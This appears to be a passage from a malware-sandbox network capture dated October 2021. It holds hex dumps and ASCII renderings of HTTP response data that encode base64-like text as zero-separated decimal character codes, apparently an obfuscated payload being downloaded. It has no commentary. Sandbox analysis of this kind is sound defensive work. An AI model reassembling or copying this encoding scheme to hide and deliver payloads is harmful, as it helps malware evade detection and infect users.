                    Data Ascii: 0 74 0 43 0 102 0 47 0 47 0 105 0 48 0 48 0 73 0 105 0 81 0 71 0 76 0 82 0 102 0 104 0 101 0 121 0 99 0 73 0 69 0 65 0 73 0 79 0 52 0 53 0 65 0 73 0 65 0 65 0 65 0 66 0 84 0 86 0 47 0 43 0 119 0 111 0 65 0 73 0 65 0 65 0 73 0 118 0 53 0 105 0 57 0 112 0 4
                    2021-10-26 16:59:18 UTC1209INData Raw: 35 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 37 32 20 30 20 38 32 20 30 20 31 30 32 20 30 20 31 30 33 20 30 20 31 30 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 39 30 20 30 20 38 38 20 30 20 31 30 35 20 30 20 35 36 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 36 36 20 30 20 36 36 20 30 20 38 31 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 31 31 39 20 30 20 31 30 32 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 31 39 20 30 20 31 30 35 20 30 20 37 36 20 30 20 31 32 32 20 30 20 34 37 20 30 20 35 37 20 30 20 35 30 20 30 20 38 39 20 30 20 37 31 20 30 20 31 31 31 20 30 20 36 35 20 30 20 34 37 20 30 20 31 32 30 20 30 20 36
                    Data Ascii: 5 0 68 0 65 0 65 0 68 0 72 0 82 0 102 0 103 0 102 0 65 0 65 0 65 0 65 0 105 0 119 0 90 0 88 0 105 0 56 0 55 0 47 0 85 0 66 0 66 0 81 0 47 0 51 0 85 0 73 0 105 0 119 0 102 0 47 0 100 0 119 0 105 0 76 0 122 0 47 0 57 0 50 0 89 0 71 0 111 0 65 0 47 0 120 0 6
                    2021-10-26 16:59:18 UTC1213INData Raw: 30 20 36 38 20 30 20 37 33 20 30 20 31 31 38 20 30 20 37 39 20 30 20 34 37 20 30 20 34 39 20 30 20 36 35 20 30 20 35 36 20 30 20 31 30 34 20 30 20 39 39 20 30 20 36 36 20 30 20 34 38 20 30 20 37 37 20 30 20 31 31 38 20 30 20 35 37 20 30 20 35 30 20 30 20 37 38 20 30 20 37 30 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 38 31 20 30 20 36 38 20 30 20 34 33 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 31 31 31 20 30 20 34 37 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 31 34 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 36 39 20 30 20 36 39 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20 36 35 20 30
                    Data Ascii: 0 68 0 73 0 118 0 79 0 47 0 49 0 65 0 56 0 104 0 99 0 66 0 48 0 77 0 118 0 57 0 50 0 78 0 70 0 67 0 78 0 104 0 81 0 68 0 43 0 47 0 47 0 57 0 111 0 47 0 119 0 65 0 65 0 65 0 70 0 68 0 111 0 114 0 107 0 65 0 65 0 65 0 73 0 80 0 69 0 69 0 73 0 50 0 70 0 65 0
                    2021-10-26 16:59:18 UTC1229INData Raw: 38 20 30 20 31 30 39 20 30 20 31 30 35 20 30 20 35 36 20 30 20 34 38 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 31 30 35 20 30 20 35 36 20 30 20 31 30 32 20 30 20 31 31 31 20 30 20 35 36 20 30 20 34 37 20 30 20 31 30 36 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 31 31 38 20 30 20 37 34 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 31 30 33 20 30 20 36 35 20 30 20 38 36 20 30 20 38 39 20 30 20 31 31 38 20 30 20 31 31 35 20 30 20 31 30 33 20 30 20 34 33 20 30 20 38 34 20 30 20 35 32 20 30 20 38 35 20 30 20 38 39 20 30 20 31 31 36 20 30 20 37 30 20 30 20 36 39 20 30 20 37 33 20 30 20 38 30 20 30 20 35 32 20 30 20 36 35 20 30 20 31 30 38 20 30 20 37 38 20 30 20 38 37 20 30 20 38
                    Data Ascii: 8 0 109 0 105 0 56 0 48 0 69 0 65 0 65 0 47 0 51 0 85 0 73 0 105 0 56 0 102 0 111 0 56 0 47 0 106 0 47 0 47 0 49 0 118 0 74 0 119 0 103 0 103 0 65 0 86 0 89 0 118 0 115 0 103 0 43 0 84 0 52 0 85 0 89 0 116 0 70 0 69 0 73 0 80 0 52 0 65 0 108 0 78 0 87 0 8
                    2021-10-26 16:59:18 UTC1241INData Raw: 30 20 34 37 20 30 20 35 35 20 30 20 39 37 20 30 20 31 30 37 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 35 37 20 30 20 38 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 38 31 20 30 20 31 30 35 20 30 20 31 32 31 20 30 20 34 39 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 35 37 20 30 20 38 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 38 35 20 30 20 34 37 20 30 20 35 37 20 30 20 38 37 20 30 20 37 36 20 30 20 31 30 34 20 30 20 31 31 33 20 30 20 38 31 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 31 31 36 20 30 20 31 31 33 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35
                    Data Ascii: 0 47 0 55 0 97 0 107 0 65 0 103 0 65 0 65 0 47 0 57 0 88 0 47 0 100 0 67 0 81 0 81 0 105 0 121 0 49 0 99 0 119 0 69 0 65 0 65 0 47 0 57 0 88 0 47 0 100 0 67 0 81 0 85 0 47 0 57 0 87 0 76 0 104 0 113 0 81 0 67 0 65 0 65 0 67 0 76 0 116 0 113 0 65 0 67 0 65
                    2021-10-26 16:59:18 UTC1257INData Raw: 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 33 20 30 20 36 37 20 30 20 35 36 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 39 30 20 30 20 39 37 20 30 20 35 36 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 33 20 30 20 36 38 20 30 20 36 35 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 39 30 20 30 20 39 38 20 30 20 36 35 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 33 20 30 20 36 38 20 30 20 36 39 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 39 30 20 30 20 39 38 20 30 20 36 39 20 30 20 38 34 20 30 20 36 35 20 30 20
                    Data Ascii: 4 0 65 0 65 0 65 0 105 0 53 0 67 0 56 0 84 0 65 0 65 0 65 0 105 0 90 0 97 0 56 0 84 0 65 0 65 0 65 0 105 0 53 0 68 0 65 0 84 0 65 0 65 0 65 0 105 0 90 0 98 0 65 0 84 0 65 0 65 0 65 0 105 0 53 0 68 0 69 0 84 0 65 0 65 0 65 0 105 0 90 0 98 0 69 0 84 0 65 0
                    2021-10-26 16:59:18 UTC1273INData Raw: 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 35 31 20 30 20 31 31 39 20 30 20 34 33 20 30 20 36 39 20 30 20 31 30 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 31 31 35 20 30 20 36 37 20 30 20 37 37 20 30 20 34 37 20 30 20 35 37 20 30 20 31 31 31 20 30 20 36 37 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 35 30 20 30 20 36 39 20 30 20 37 34 20 30 20 37 32 20 30 20 38 39 20 30 20 37 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 38 35 20 30 20 37 31 20 30 20 39 37 20 30 20 37 34 20 30 20 31 31 38 20 30 20 36 37 20 30 20 38 32 20 30 20 35 36 20 30 20 36 36 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20
                    Data Ascii: 9 0 65 0 65 0 65 0 67 0 76 0 51 0 119 0 43 0 69 0 105 0 65 0 69 0 65 0 65 0 79 0 115 0 67 0 77 0 47 0 57 0 111 0 67 0 65 0 73 0 65 0 65 0 73 0 50 0 69 0 74 0 72 0 89 0 71 0 65 0 65 0 66 0 88 0 85 0 71 0 97 0 74 0 118 0 67 0 82 0 56 0 66 0 103 0 65 0 65 0
                    2021-10-26 16:59:18 UTC1289INData Raw: 31 31 32 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 37 38 20 30 20 38 31 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 35 36 20 30 20 34 37 20 30 20 35 37 20 30 20 39 37 20 30 20 37 36 20 30 20 38 34 20 30 20 38 31 20 30 20 31 30 35 20 30 20 37 34 20 30 20 36 35 20 30 20 38 34 20 30 20 37 38 20 30 20 37 30 20 30 20 34 37 20 30 20 37 35 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 37 30 20 30 20 31 30 34 20 30 20 31 31 31 20 30 20 31 31 30 20 30 20 37 37 20 30 20 34 39 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 34 37 20 30 20 38 38 20 30 20 39 37 20 30 20 36 38 20 30 20 36 38 20 30 20 39 37 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 31
                    Data Ascii: 112 0 65 0 65 0 70 0 78 0 81 0 105 0 85 0 88 0 56 0 47 0 57 0 97 0 76 0 84 0 81 0 105 0 74 0 65 0 84 0 78 0 70 0 47 0 75 0 107 0 65 0 65 0 80 0 68 0 47 0 100 0 70 0 104 0 111 0 110 0 77 0 49 0 65 0 65 0 80 0 47 0 88 0 97 0 68 0 68 0 97 0 81 0 65 0 66 0 81
                    2021-10-26 16:59:18 UTC1305INData Raw: 38 35 20 30 20 37 37 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 35 20 30 20 38 35 20 30 20 34 37 20 30 20 35 37 20 30 20 38 39 20 30 20 35 33 20 30 20 38 38 20 30 20 38 32 20 30 20 38 33 20 30 20 37 34 20 30 20 38 32 20 30 20 38 32 20 30 20 36 35 20 30 20 38 30 20 30 20 31 30 34 20 30 20 36 35 20 30 20 39 39 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 35 35 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 34 33 20 30 20 36 39 20 30 20 34 37 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 35 20 30 20 34 39 20 30 20 39 39 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 37 38 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35
                    Data Ascii: 85 0 77 0 105 0 85 0 85 0 85 0 47 0 57 0 89 0 53 0 88 0 82 0 83 0 74 0 82 0 82 0 65 0 80 0 104 0 65 0 99 0 66 0 65 0 65 0 65 0 55 0 119 0 119 0 43 0 69 0 47 0 119 0 65 0 65 0 65 0 73 0 115 0 49 0 99 0 77 0 66 0 65 0 65 0 70 0 78 0 111 0 65 0 65 0 103 0 65
                    2021-10-26 16:59:18 UTC1321INData Raw: 30 20 35 34 20 30 20 37 30 20 30 20 36 35 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 38 32 20 30 20 31 30 33 20 30 20 31 30 33 20 30 20 35 35 20 30 20 31 31 39 20 30 20 34 39 20 30 20 31 30 38 20 30 20 39 30 20 30 20 31 30 32 20 30 20 31 30 35 20 30 20 31 30 30 20 30 20 38 31 20 30 20 39 37 20 30 20 36 38 20 30 20 38 34 20 30 20 39 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 31 32 32 20 30 20 35 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 31 31 31 20 30 20 34 37 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 32 32 20 30 20 31 30 33 20 30 20 37 33 20 30 20 36 35 20
                    Data Ascii: 0 54 0 70 0 65 0 68 0 65 0 65 0 67 0 76 0 82 0 103 0 103 0 55 0 119 0 49 0 108 0 90 0 102 0 105 0 100 0 81 0 97 0 68 0 84 0 99 0 81 0 65 0 67 0 78 0 104 0 102 0 122 0 57 0 47 0 47 0 57 0 111 0 47 0 119 0 65 0 65 0 65 0 70 0 68 0 111 0 122 0 103 0 73 0 65
                    2021-10-26 16:59:18 UTC1337INData Raw: 39 20 30 20 35 35 20 30 20 31 31 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 37 32 20 30 20 35 35 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 38 33 20 30 20 35 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 34 20 30 20 37 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 37 20 30 20 35 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 32 20 30 20 37 39 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 39 38 20 30 20 31
                    Data Ascii: 9 0 55 0 116 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 69 0 81 0 65 0 65 0 103 0 72 0 55 0 107 0 65 0 65 0 67 0 83 0 53 0 65 0 65 0 65 0 114 0 79 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 67 0 77 0 55 0 81 0 65 0 65 0 102 0 79 0 48 0 65 0 65 0 71 0 98 0 1
                    2021-10-26 16:59:18 UTC1353INData Raw: 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 37 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 37 33 20 30 20 36 35 20 30 20 31 30 30 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 37 20 30 20 36 35 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 36 20 30 20 37 34 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 31 30 30 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 31 38 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 35 20 30 20 36 35 20 30 20 39 30 20 30 20 38 31 20 30 20 36 36 20 30 20 31 32 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36
                    Data Ascii: 0 103 0 65 0 103 0 65 0 67 0 85 0 65 0 99 0 119 0 65 0 65 0 65 0 70 0 73 0 65 0 100 0 81 0 66 0 117 0 65 0 69 0 69 0 65 0 99 0 119 0 66 0 74 0 65 0 71 0 52 0 65 0 100 0 103 0 66 0 118 0 65 0 71 0 115 0 65 0 90 0 81 0 66 0 121 0 65 0 65 0 65 0 65 0 65 0 6
                    2021-10-26 16:59:18 UTC1369INData Raw: 35 20 30 20 38 30 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 37 20 30 20 36 35 20 30 20 38 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 39 20 30 20 36 35 20 30 20 37 36 20 30 20 31 31 39 20 30 20 36 35 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 37 20 30 20 36 35 20 30 20 38 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 35 36 20 30 20 36 35 20 30 20 36 37 20 30 20 35 36 20 30 20 36 35 20 30 20 31 30 30
                    Data Ascii: 5 0 80 0 65 0 65 0 108 0 65 0 72 0 77 0 65 0 80 0 103 0 65 0 78 0 65 0 65 0 111 0 65 0 65 0 65 0 65 0 65 0 65 0 68 0 119 0 65 0 76 0 119 0 65 0 108 0 65 0 72 0 77 0 65 0 80 0 103 0 65 0 78 0 65 0 65 0 111 0 65 0 65 0 65 0 65 0 56 0 65 0 67 0 56 0 65 0 100
                    2021-10-26 16:59:18 UTC1385INData Raw: 20 30 20 38 35 20 30 20 36 35 20 30 20 39 30 20 30 20 31 31 39 20 30 20 36 35 20 30 20 35 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 34 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 30 34 20 30 20 36 35 20 30 20 37 31 20 30 20 34 38 20 30 20 36 35 20 30 20 39 39 20 30 20 36 35 20 30 20 36 35 20 30 20 35 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 35 20 30 20 36 35 20 30 20 37 32 20 30 20 37 33 20 30 20 36 35 20 30 20 38 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 39 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36
                    Data Ascii: 0 85 0 65 0 90 0 119 0 65 0 55 0 65 0 65 0 65 0 65 0 74 0 103 0 66 0 104 0 65 0 71 0 48 0 65 0 99 0 65 0 65 0 55 0 65 0 65 0 65 0 65 0 80 0 65 0 66 0 105 0 65 0 72 0 73 0 65 0 80 0 103 0 65 0 65 0 65 0 65 0 65 0 65 0 80 0 65 0 66 0 109 0 65 0 71 0 56 0 6
                    2021-10-26 16:59:18 UTC1401INData Raw: 30 20 35 30 20 30 20 38 36 20 30 20 34 38 20 30 20 38 32 20 30 20 38 37 20 30 20 35 33 20 30 20 35 30 20 30 20 39 37 20 30 20 38 38 20 30 20 37 34 20 30 20 31 31 38 20 30 20 39 38 20 30 20 31 30 39 20 30 20 34 39 20 30 20 31 30 38 20 30 20 39 38 20 30 20 31 31 30 20 30 20 38 32 20 30 20 38 37 20 30 20 38 39 20 30 20 38 38 20 30 20 37 34 20 30 20 31 31 32 20 30 20 38 39 20 30 20 38 37 20 30 20 37 34 20 30 20 31 31 35 20 30 20 39 30 20 30 20 38 36 20 30 20 39 39 20 30 20 36 35 20 30 20 38 31 20 30 20 31 31 39 20 30 20 37 30 20 30 20 37 32 20 30 20 39 30 20 30 20 38 38 20 30 20 38 32 20 30 20 36 38 20 30 20 31 30 30 20 30 20 38 38 20 30 20 37 34 20 30 20 31 32 31 20 30 20 39 30 20 30 20 38 37 20 30 20 35 33 20 30 20 34 38 20 30 20 38 35 20 30 20 37 32 20 30
                    Data Ascii: 0 50 0 86 0 48 0 82 0 87 0 53 0 50 0 97 0 88 0 74 0 118 0 98 0 109 0 49 0 108 0 98 0 110 0 82 0 87 0 89 0 88 0 74 0 112 0 89 0 87 0 74 0 115 0 90 0 86 0 99 0 65 0 81 0 119 0 70 0 72 0 90 0 88 0 82 0 68 0 100 0 88 0 74 0 121 0 90 0 87 0 53 0 48 0 85 0 72 0
                    2021-10-26 16:59:18 UTC1417INData Raw: 20 30 20 39 30 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 34 39 20 30 20 31 31 39 20 30 20 37 30 20 30 20 38 33 20 30 20 39 30 20 30 20 38 37 20 30 20 31 30 30 20 30 20 36 39 20 30 20 39 30 20 30 20 38 37 20 30 20 31 32 30 20 30 20 31 30 38 20 30 20 31 30 30 20 30 20 37 31 20 30 20 38 36 20 30 20 37 36 20 30 20 39 30 20 30 20 38 38 20 30 20 31 30 38 20 30 20 38 38 20 30 20 36 35 20 30 20 37 37 20 30 20 31 31 35 20 30 20 36 36 20 30 20 38 35 20 30 20 31 30 39 20 30 20 38 36 20 30 20 31 31 30 20 30 20 38 31 20 30 20 35 30 20 30 20 31 32 30 20 30 20 31 31 38 20 30 20 39 39 20 30 20 35 30 20 30 20 38 36 20 30 20 37 36 20 30 20 39 30 20 30 20 38 38 20 30 20 31 30 37 20 30 20 36 35 20 30 20 31 31 34 20 30 20 36 35 20 30 20 37 30 20 30 20 38 30 20 30
                    Data Ascii: 0 90 0 81 0 65 0 65 0 49 0 119 0 70 0 83 0 90 0 87 0 100 0 69 0 90 0 87 0 120 0 108 0 100 0 71 0 86 0 76 0 90 0 88 0 108 0 88 0 65 0 77 0 115 0 66 0 85 0 109 0 86 0 110 0 81 0 50 0 120 0 118 0 99 0 50 0 86 0 76 0 90 0 88 0 107 0 65 0 114 0 65 0 70 0 80 0
                    2021-10-26 16:59:18 UTC1433INData Raw: 20 31 30 33 20 30 20 37 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 36 37 20 30 20 38 31 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 33 20 30 20 37 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35
                    Data Ascii: 103 0 71 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 69 0 65 0 67 0 81 0 81 0 65 0 65 0 71 0 103 0 71 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 81 0 65 0 65
                    2021-10-26 16:59:18 UTC1449INData Raw: 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 30 20 30 20 31 30 39 20 30 20 31 31 36 20 30 20 31 30 32 20 30 20 34 37 20 30 20 35 37 20 30 20 31 30 39 20 30 20 34 39 20 30 20 34 37 20 30 20 35 37 20 30 20 31 30 39 20 30 20 34 39 20 30 20 34 37 20 30 20 35 37 20 30 20 31 30 39 20 30 20 34 39 20 30 20 34 37 20 30 20 35 37 20 30 20 31 30 39 20 30 20 34 39 20 30 20 34 37 20 30 20 35 37 20 30 20 31 30 39 20 30 20 34 39 20 30 20 34 37 20 30 20 35 37 20 30 20 31 30 39 20
                    Data Ascii: 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 110 0 109 0 116 0 102 0 47 0 57 0 109 0 49 0 47 0 57 0 109 0 49 0 47 0 57 0 109 0 49 0 47 0 57 0 109 0 49 0 47 0 57 0 109 0 49 0 47 0 57 0 109
                    2021-10-26 16:59:18 UTC1465INData Raw: 30 20 31 31 38 20 30 20 38 39 20 30 20 39 30 20 30 20 31 31 33 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 39 30 20 30 20 34 37 20 30 20 35 36 20 30 20 38 37 20 30 20 38 31 20 30 20 34 37 20 30 20 35 36 20 30 20 38 37 20 30 20 38 31 20 30 20 31 32 32 20 30 20 31 31 32 20 30 20 37 38 20 30 20 31 31 39 20 30 20 34 37 20 30 20 34 37 20 30 20 31 32 32 20 30 20 35 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 38 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 39 38 20 30 20 31 31 34 20 30 20 31 31 30 20 30 20 31 30 39 20 30 20 38 36 20 30 20 38 39 20 30 20 34 38
                    Data Ascii: 0 118 0 89 0 90 0 113 0 47 0 43 0 118 0 90 0 47 0 56 0 87 0 81 0 47 0 56 0 87 0 81 0 122 0 112 0 78 0 119 0 47 0 47 0 122 0 52 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 47 0 118 0 51 0 47 0 47 0 98 0 114 0 110 0 109 0 86 0 89 0 48
                    2021-10-26 16:59:18 UTC1481INData Raw: 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20
                    Data Ascii: 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 69 0
                    2021-10-26 16:59:18 UTC1497INData Raw: 31 31 34 20 30 20 31 31 37 20 30 20 34 33 20 30 20 34 37 20 30 20 35 37 20 30 20 31 32 32 20 30 20 31 30 33 20 30 20 35 32 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 35 34 20 30 20 37 39 20 30 20 39 38 20 30 20 37 35 20 30 20 34 37 20 30 20 35 34 20 30 20 31 31 37 20 30 20 37 37 20 30 20 36 35 20 30 20 38 30 20 30 20 34 37 20 30 20 31 30 39 20 30 20 35 33 20 30 20 31 30 33 20 30 20 36 38 20 30 20 34 37 20 30 20 35 33 20 30 20 31 31 37 20 30 20 38 39 20 30 20 36 35 20 30 20 34 37 20 30 20 34 33 20 30 20 39 38 20 30 20 31 30 39 20 30 20 36 35 20 30 20 38 30 20 30 20 34 37 20 30 20 31 30 39 20 30 20 35 33 20 30 20 31 30 33 20 30 20 36 38 20 30 20 34 37 20 30 20 35 33 20 30 20 31 31
